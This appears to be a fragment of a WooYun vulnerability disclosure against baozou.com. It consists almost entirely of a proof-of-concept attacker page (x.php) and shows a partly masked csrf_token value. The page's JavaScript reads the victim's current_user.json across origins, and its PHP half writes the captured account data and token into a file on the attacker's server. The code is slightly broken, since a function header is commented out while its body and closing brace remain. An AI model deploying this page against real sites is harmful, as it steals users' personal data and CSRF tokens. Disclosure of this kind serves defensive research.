WooYun.org

csrf_token:"+ZEJOyFjEVBwx*****Hn5LyDUVqRjLqW/dF+o=

x.php

<script type="text/javascript">
//用于创建XMLHttpRequest对象
function createXmlHttp() {
//根据window.XMLHttpRequest对象是否存在使用不同的创建方式
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest(); //FireFox、Opera等浏览器支持的创建方式
} else {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");//IE浏览器支持的创建方式
}
}
//直接通过XMLHttpRequest对象获取远程网页源代码
//function getSource() {
createXmlHttp(); //创建XMLHttpRequest对象
xmlHttp.onreadystatechange = writeSource; //设置回调函数
xmlHttp.open("GET", "http://baozou.com/current_user.json", true);
xmlHttp.send(null);
}
//将远程网页源代码写入页面文字区域
function writeSource() {
if (xmlHttp.readyState == 4) {
document.getElementById("source").value = xmlHttp.responseText;
}
}
</script>
<form method="POST">
<textarea name="c" rows="10" cols="80" id="source"></textarea><P>
<input type="button" onclick="getSource()" value="SB"><P>
<input type="submit" name="submit" value="先点SB再点我">
<form>
<?php
if($_POST['submit']){
$filename = 'file.htm';
$c=$_POST['c'];
$word = "data:$c <BR>";
echo $c;
$fh = fopen($filename, "a");
fwrite($fh, $word);
fclose($fh);
}
?>